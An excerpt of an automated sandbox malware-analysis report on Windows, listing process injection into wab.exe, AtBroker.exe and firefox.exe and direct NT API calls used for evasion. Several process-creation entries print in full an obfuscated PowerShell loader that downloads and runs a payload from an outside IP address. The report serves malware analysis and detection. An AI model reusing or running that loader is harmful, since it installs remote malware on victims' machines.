        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04518397 mov eax, dword ptr fs:[00000030h]11_2_04518397
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451E388 mov eax, dword ptr fs:[00000030h]11_2_0451E388
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451E388 mov eax, dword ptr fs:[00000030h]11_2_0451E388
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451E388 mov eax, dword ptr fs:[00000030h]11_2_0451E388
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454438F mov eax, dword ptr fs:[00000030h]11_2_0454438F
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0454438F mov eax, dword ptr fs:[00000030h]11_2_0454438F
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452AC50 mov eax, dword ptr fs:[00000030h]11_2_0452AC50
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452AC50 mov eax, dword ptr fs:[00000030h]11_2_0452AC50
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452AC50 mov eax, dword ptr fs:[00000030h]11_2_0452AC50
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452AC50 mov eax, dword ptr fs:[00000030h]11_2_0452AC50
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452AC50 mov eax, dword ptr fs:[00000030h]11_2_0452AC50
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0452AC50 mov eax, dword ptr fs:[00000030h]11_2_0452AC50
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04526C50 mov eax, dword ptr fs:[00000030h]11_2_04526C50
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04526C50 mov eax, dword ptr fs:[00000030h]11_2_04526C50
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04526C50 mov eax, dword ptr fs:[00000030h]11_2_04526C50
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04554C59 mov eax, dword ptr fs:[00000030h]11_2_04554C59
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530C00 mov eax, dword ptr fs:[00000030h]11_2_04530C00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530C00 mov eax, dword ptr fs:[00000030h]11_2_04530C00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530C00 mov eax, dword ptr fs:[00000030h]11_2_04530C00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04530C00 mov eax, dword ptr fs:[00000030h]11_2_04530C00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0455CC00 mov eax, dword ptr fs:[00000030h]11_2_0455CC00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045A4C0F mov eax, dword ptr fs:[00000030h]11_2_045A4C0F
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C4C34 mov eax, dword ptr fs:[00000030h]11_2_045C4C34
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C4C34 mov eax, dword ptr fs:[00000030h]11_2_045C4C34
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C4C34 mov eax, dword ptr fs:[00000030h]11_2_045C4C34
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C4C34 mov eax, dword ptr fs:[00000030h]11_2_045C4C34
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C4C34 mov eax, dword ptr fs:[00000030h]11_2_045C4C34
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C4C34 mov eax, dword ptr fs:[00000030h]11_2_045C4C34
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045C4C34 mov ecx, dword ptr fs:[00000030h]11_2_045C4C34
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451EC20 mov eax, dword ptr fs:[00000030h]11_2_0451EC20
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045BCC20 mov eax, dword ptr fs:[00000030h]11_2_045BCC20
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045BCC20 mov eax, dword ptr fs:[00000030h]11_2_045BCC20
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0451CCC8 mov eax, dword ptr fs:[00000030h]11_2_0451CCC8
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04552CF0 mov eax, dword ptr fs:[00000030h]11_2_04552CF0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04552CF0 mov eax, dword ptr fs:[00000030h]11_2_04552CF0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04552CF0 mov eax, dword ptr fs:[00000030h]11_2_04552CF0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04552CF0 mov eax, dword ptr fs:[00000030h]11_2_04552CF0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04518C8D mov eax, dword ptr fs:[00000030h]11_2_04518C8D
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04548CB1 mov eax, dword ptr fs:[00000030h]11_2_04548CB1
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04548CB1 mov eax, dword ptr fs:[00000030h]11_2_04548CB1
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0CB5 mov eax, dword ptr fs:[00000030h]11_2_045D0CB5
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0CB5 mov eax, dword ptr fs:[00000030h]11_2_045D0CB5
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0CB5 mov eax, dword ptr fs:[00000030h]11_2_045D0CB5
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0CB5 mov eax, dword ptr fs:[00000030h]11_2_045D0CB5
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0CB5 mov eax, dword ptr fs:[00000030h]11_2_045D0CB5
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_045D0CB5 mov eax, dword ptr fs:[00000030h]11_2_045D0CB5

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtClose: Direct from: 0x76F02B6C
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtUnmapViewOfSection: Direct from: 0x76F02D3CJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeSection loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeThread register set: target process: 7908Jump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeThread APC queued: target process: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3200000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2F0FB14Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (cJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\ceilometers.Pri && echo $"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (cJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\ceilometers.Pri && echo $"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$kildematerialet107 = 1;$kernevaabnet='substrin';$kernevaabnet+='g';function ciceroner($bldgringer){$cholecystogram=$bldgringer.length-$kildematerialet107;for($brandsituationerne=1; $brandsituationerne -lt $cholecystogram; $brandsituationerne+=(2)){$categoricalness+=$bldgringer.$kernevaabnet.invoke($brandsituationerne, $kildematerialet107);}$categoricalness;}function nonsensitizeds($whap){& ($skimpiness) ($whap);}$autoindtrks=ciceroner 'pm,o z i l loak/,5k. 0 ( w.ianrd ouw sc netc ,1s0.. 0m;i w i nu6 4.;w pxs6r4 ;, rrvk: 1 2b1a. 0 )s cg.egckk oa/ 2e0r1s0 0l1 0y1t .ftior,e,f o.xp/n1s2u1g.,0b ';$hypsilophodontoid21=ciceroner 'ku.s epr - a g e,npt ';$lydsidernes=ciceroner 'uh totmp,:./ /l8b7 . 1 2 1w..1 0.5r.g1 6u3 /.bfo,lpd,kcluusbhbsecn s,. p ckzn ';$jvnhjde=ciceroner ',>, ';$skimpiness=ciceroner 'aijeux, ';$equichangeable='jynginae';nonsensitizeds (ciceroner '.s,ert -bc omn,tpe nptm -zpsa tnh wt :e\sftegi ..t xctu g-,v all,u,er $aesq uiipc,hfa npg eba b l.e ;m ');nonsensitizeds (ciceroner ',i.f. e(btkeks te- p a t h tb: \afae i..stgxtt ),{ euxiimt }w; ');$nutmegged = ciceroner 'qebc.hsou %taop p dsast at%,\acbeji,l.oamee.t eir s,.bpbraiu h&,&. edc,hdob $. ';nonsensitizeds (ciceroner ' $ gslro bta l.:,c otnnv est h.=k(.c mddt a/ac $rn uft.mme g,gpefdl)p ');nonsensitizeds (ciceroner 'f$ogkl o b aals:tl itn i e sfk r.i vuevrasr=f$nlbyddss i d,etrinress,.ns.p lli t ( $hj.v n hfjld,e,). ');$lydsidernes=$linieskrivers[0];nonsensitizeds (ciceroner 't$og leo b aulr: rae fse.r eln c e.v rtkde rw=pnce w - o b j.epcstu .shypspt enmd. n e.tg.jwee bfc.lti e,n t. ');nonsensitizeds (ciceroner 'u$ur.ekfae rde,nsc e,v 